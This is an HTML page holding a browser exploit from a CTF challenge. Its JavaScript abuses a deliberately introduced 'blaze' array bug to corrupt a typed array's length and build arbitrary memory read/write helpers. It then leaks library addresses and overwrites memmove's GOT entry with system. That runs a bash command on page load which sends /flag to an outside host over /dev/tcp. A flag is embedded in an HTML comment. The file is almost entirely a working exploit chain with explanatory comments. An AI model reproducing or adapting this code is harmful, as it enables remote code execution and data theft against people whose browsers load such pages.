<!DOCTYPE html>
<html>
<!-- flag{fire_just_makes_the_blaze_better} -->
<head>
<meta charset="utf-8">
<script src="utils.js"></script>
<title></title>
<script type="text/javascript">
function exploit() {
// Proof-of-concept from a CTF challenge. It depends on a non-standard
// `Array.prototype.blaze` method (called below) that no stock JavaScript
// engine provides - presumably the bug deliberately introduced into the
// challenge build - and on `log` and `Int64`, which are not defined in this
// file (presumably supplied by utils.js, included in <head>). On a standard
// engine `arr.blaze` is undefined, so the call throws a TypeError and nothing
// after it runs. Returns nothing; all of the numeric offsets below are
// specific to the challenge's binaries and have no meaning elsewhere.
//
// Note: most names below are assigned without var/let/const and therefore
// become implicit globals; only ptr_overwrite_idx, i, target and cmd are local.
arr = [0x11223344];
// Two 32-byte buffers, each with a Uint32Array view (8 elements) whose first
// element is set to a recognisable marker value.
ab = new ArrayBuffer(32);
overwrite_len = new Uint32Array(ab);
overwrite_len[0] = 0x77777777;
victim_ab = new ArrayBuffer(32);
victim = new Uint32Array(victim_ab);
victim[0] = 0x88888888;
log("starting");
// Challenge-specific method; its effect is not visible from this file.
arr.blaze();
// Stores index 7 of a one-element array. The scan that follows reads
// overwrite_len up to index 999 although its buffer holds only 8 elements, so
// the code evidently expects this store to have corrupted the typed array's
// length - the out-of-bounds read/write everything else builds on.
arr[7] = 0x10000;
var ptr_overwrite_idx = -1;
// Search past the end of overwrite_len for victim's marker; if found, replace
// it and remember the index. Every later offset is taken relative to it.
for (var i = 0; i < 1000; i++) {
if (overwrite_len[i] == 0x88888888) {
overwrite_len[i] = 0x98888888;
ptr_overwrite_idx = i;
break;
}
}
log(`ptr_overwrite_idx ${ptr_overwrite_idx} `);
// Marker not found within range (heap layout not as assumed): give up rather
// than write at a guessed offset.
if (ptr_overwrite_idx == -1) {
return;
}
// from https://github.com/phoenhex/files/blob/master/exploits/share-with-care/exploit.js
// Read/write helpers. Each goes through a fresh typed-array view over
// victim_ab created after the two 32-bit words at ptr_overwrite_idx-8 / -7
// have been overwritten with the (shifted) target address; the code treats
// those two words as the location the new view will alias. The -8/-7 offsets
// are layout-specific to the target build and are not derived here.
memory = {
prepare: function(addr, typed_array) {
x = new Int64(addr);
x.rshift();   // Int64 comes from utils.js; the shift amount is whatever it defines
overwrite_len[ptr_overwrite_idx - 8] = x.lower();
overwrite_len[ptr_overwrite_idx - 7] = x.upper();
return new typed_array(victim_ab);
},
// Store a 64-bit value at addr as two 32-bit halves, low word first.
write: function(addr, data) {
view = memory.prepare(addr, Uint32Array);
x = new Int64(data)
view[0] = x.lower();
view[1] = x.upper();
},
// Read a 64-bit value at addr. The halves are combined as a Number, which
// is exact only while the result stays below 2^53.
read: function(addr) {
view = memory.prepare(addr, Uint32Array);
return new Int64(view[0] + 256 ** 4 * view[1]);
},
// Same as read but keeps only the low 16 bits of the upper word (48 bits in
// total); presumably strips a tag kept in the high bits - TODO confirm.
readWithTag: function(addr) {
view = memory.prepare(addr, Uint32Array);
return new Int64(view[0] + 256 ** 4 * (view[1] & 0xffff));
}
}
// Leak the address of a native function: attach it and a marker to victim_ab
// as properties, read the 64-bit word at ptr_overwrite_idx-13/-12 (note: high
// word first here, the reverse of memory.read), follow it with readWithTag,
// then read 5*8 bytes further in. The -13/-12 and 5*8 offsets are again
// layout-specific to the target build.
function leak_native(nat_func) {
victim_ab.yolo = nat_func;
victim_ab.haha = 0x13391339;
slots = overwrite_len[ptr_overwrite_idx - 13] * 2 ** 32 + overwrite_len[ptr_overwrite_idx - 12];
slots_0 = (memory.readWithTag(slots).toInt());
return memory.read(slots_0 + 5 * 8).toInt()
}
nat_func = leak_native(Date.now);
log("[+] Date.now @ " + nat_func.toString(16) + "\n");
// Derive further addresses from hard-coded distances: the "xul base" (as the
// log calls it) from Date.now, two GOT slots from that base, libc's base
// from the value stored in the dup slot, and system from libc's base. Every
// constant here is specific to the challenge's library builds.
xul_base = nat_func - 0x49c7ab0;
memmove_got = xul_base + 0x0000818b220;
dup_got = xul_base + 0x0000818b738;
dup_libc = memory.read(dup_got);
libc_base = dup_libc - 0xf7940;
system_libc = libc_base + 0x45390;
log("[+] xul base @ " + xul_base.toString(16), true);
log("[+] memmove@got @ " + memmove_got.toString(16), true);
log("[+] libc_base@libc_@_" + libc_base.toString(16), true);
log("[+] system@libc @ " + system_libc.toString(16), true);
// NUL-terminated command string in a byte buffer (charCodeAt truncates to a
// byte per character, which is fine for this ASCII string).
var target = new Uint8Array(100);
var cmd = "bash -ic 'cat /flag > /dev/tcp/my.host/12345' &";
for (var i = 0; i < cmd.length; i++) {
target[i] = cmd.charCodeAt(i);
}
target[cmd.length] = 0;
// Swap the memmove GOT entry for system, trigger a typed-array copy (which
// the code expects to reach memmove with target's contents as its first
// argument), then put the original entry back.
memmove_backup = memory.read(memmove_got);
memory.write(memmove_got, system_libc);
target.copyWithin(0, 1);
memory.write(memmove_got, memmove_backup);
}
// Entry point: the script sits in <head>, so this runs synchronously while the
// page is being parsed, before <body> exists.
exploit();
</script>
</head>
<body>
</body>
</html>
<!-- 0x00007f9c4b7a6138│+0xc8: 0x00007f9c4b7a70a0 → 0x8899001177889900 -->